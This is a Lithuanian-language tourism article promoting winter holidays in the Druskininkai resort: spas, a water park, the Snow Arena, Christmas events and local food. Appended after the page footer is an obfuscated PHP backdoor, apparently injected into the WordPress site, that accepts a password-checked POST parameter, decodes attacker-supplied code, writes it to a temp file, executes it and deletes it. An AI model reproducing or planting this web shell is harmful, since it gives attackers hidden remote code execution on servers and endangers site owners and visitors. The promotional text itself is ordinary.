fbpx
A A
A A

Šventiniai ir paprasti Druskininkų stebuklai – tiesiog pamirškite rūpesčius ir mėgaukitės gyvenimu

2023.11.24

Nuostabių švenčių magija alsuojanti žiema dosni dovanomis, tačiau juk palepinti save bei  savo brangius žmones nebūtina speciali proga. O juolab kai kalbame apie mūsų savijautą. Tamsųjį žvarbųjį metą piečiausiame šalies kampelyje įsikūrę Druskininkai apgaubs svetinga šiluma ir primins: atėjo metas pagalvoti apie save! Tad skirkite sau kokybiško laiko ir nerkite į nerūpestingą palaimos vandenyną – mėgaukitės gausybe sveikatinimo procedūrų, maloniu poilsiu, o sustiprinę kūną bei atgaivinę sielą, leiskitės į džiaugsmingus gyvenimo šventės atradimus.

Daugiau nei tūkstantis procedūrų

Šimtus metų į Druskininkus žmones viliojo plačios sveikatinimosi galimybės. Čia iš kartos į kartą savo meistrystę perduodantys specialistai didžiulį patirties bagažą nuolat praturtina naujomis žiniomis. Nuo purvo vonių, gintaro procedūrų, pirties ritualų, įvairiausi masažų iki gydymo muzika ar šalčio kamerų – visa tai ir dar daug kitų žmogui naudingų terapijų galima rasti viename mieste.

Ar žinojote, kad šiandien Druskininkuose veikiančiose devyniose gydyklose ir sanatorijose bei gausybėje SPA centrų atliekama daugiau nei 1,3 tūkst. skirtingų procedūrų? Visos jos aprėpia tiek tradicines, tiek šiuolaikines sveikatinimo bei diagnostikos praktikas.

Druskininkuose kuriamos terapijos, kurios padeda sustiprinti imunitetą, atkurti fiziologinę medžiagų apykaitą, atsipalaiduoti nuo streso, išvalyti organizmą nuo toksinų. Procedūroms atlikti pasitelkiamos pačios įvairiausios priemonės: gydomasis purvas, gintaras, deguonis, druska, muzika, medus, ekstremalus šaltis, dėlės, prancūziškos levandos, lietuviškų pušų ekstraktas, šokoladas, akmenys, molis, grikių kruopos, rožių aliejus, saulė, oras… Tai yra visa, kas padeda žmogui pajusti harmoniją su gamta ir savimi.

Įkvėpti tyresnio nei kalnų oro

Daugelis neabejotinai žino, jog Druskininkus nuo seno garsina čia srūvančios gydomosios versmės. Tačiau tai toli gražu ne vienintelis sveikatinimo šaltinis, kurį dovanoja gamta: kurorto oras – taip pat ypatingas. Druskininkų nedusina pramonės ir kiti taršos šaltiniai, o šimtamečiai pušynai tarsi didžiuliai miesto plaučiai išvalo orą ir prisotina jį vertingaisiais eteriniais aliejais. Dar nuostabesni pojūčiai laukia K. Dineikos sveikatingumo parke esančiame jonizacijos paviljone. Jis unikalus ypač švariu, neigiamais jonais gausiai prisodrintu oru – skaičiuojama, kad jų koncentracija čia kone 100 kartų didesnė nei kalnuose!

Tropikai ir sniegynai – vienu metu

Turiningų pramogų visai šeimai Druskininkai gali pasiūlyti bet kuriuo metų laiku. Net ir žvarbiausiomis žiemos dienomis čia galima pasijusti it pietų kurorte – Vandens parke oro temperatūra visada siekia 30–31, o baseinai vilioja 26–27 laipsnių šiluma. Tuo metu vasaros įkarštyje pasiilgus žiemos tereikia praverti „Snow Arenos“ duris, kur vidutinė temperatūra svyruoja nuo 2 iki 4 laipsnių šalčio, o pažangiosios technologijos slidinėjimo trasas leidžia aprūpinti šviežiu, jokių cheminių priedų neturinčiu sniegu.

Žiemos šventės – kaip pasakoje

Ne veltui sparčiai šylant klimatui Druskininkų „Snow Arenoje“ savo namelį nusprendė įkurdinti ir pats žiemos švenčių šeimininkas – Kalėdų Senelis. Juk būtent čia baltutėliu ir šaltutėliu sniegu galima džiaugtis kiekvieną mielą dieną. Tad jau nuo gruodžio pradžios arena taps oficialia Kalėdų rezidencija.

Tuo metu tamsius žiemos vakarus Druskininkai nušvies ryškiausiomis spalvomis bei sušildys jaukiu gražiausių metų švenčių laukimu. Į vieną svarbiausių kalėdinių renginių miestas pakvies jau pirmąjį gruodžio šeštadienio vakarą, kuris bus kupinas gerumo, muzikos, linksmų pramogų, kvapų, skonių ir, žinoma, šviesos. Bus gražu tarsi pasakoje – kurorto širdyje sužėrės švytinčiu lazerių rūbu apgaubta didžioji miesto eglė, aplink Muzikinį fontaną nušvis originalių kalėdinių eglučių parkas. O savivaldybės pastato fasadas užleis vietą įspūdingiems vaizdo ir garso spektakliams – spalvingai 3D projekcijai, kuri pasakos nuotaikingą Kalėdų istoriją.

Šventinį laikotarpį miestas žada gausių įdomybių, tad skubėkite studijuoti programą kaledoskurorte.lt ir planuoti laiką linksmybėms.

Gurmaniškų pažinimų kelionė

Sakoma, jog dalis įspūdžių, grįžus iš svečių vietų, prisimenami skoniais. Neabejokite – viešnagė Druskininkuose pažers unikalių gastronominių nuotykių. Lankantis kurorte tiesiog privalu paragauti patiekalų iš grybų ir uogų – šie pagrindiniai regiono nacionalinių patiekalų ingredientai daliai vietos gyventojų netgi tapo pragyvenimo šaltiniu. Taip pat čia galima ne tik aplankyti žymųjį sūrių ūkį, bet ir pačiam sudalyvauti jo gamyboje. Pasinerti į panašias patirtis – išsikepti nuostabaus burnoje tirpstančio deserto – kviečia ir vienintelis pasaulyje šakočių muziejus. O kur dar begalė gurmaniškų pagundų: nuo įvairių pasaulio virtuvių iki reiklių maisto kritikų pripažintų restoranų. Tad atraskite, ragaukite, džiaukitės, mėgaukitės. Ne vien maistu – ir gyvenimu!

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}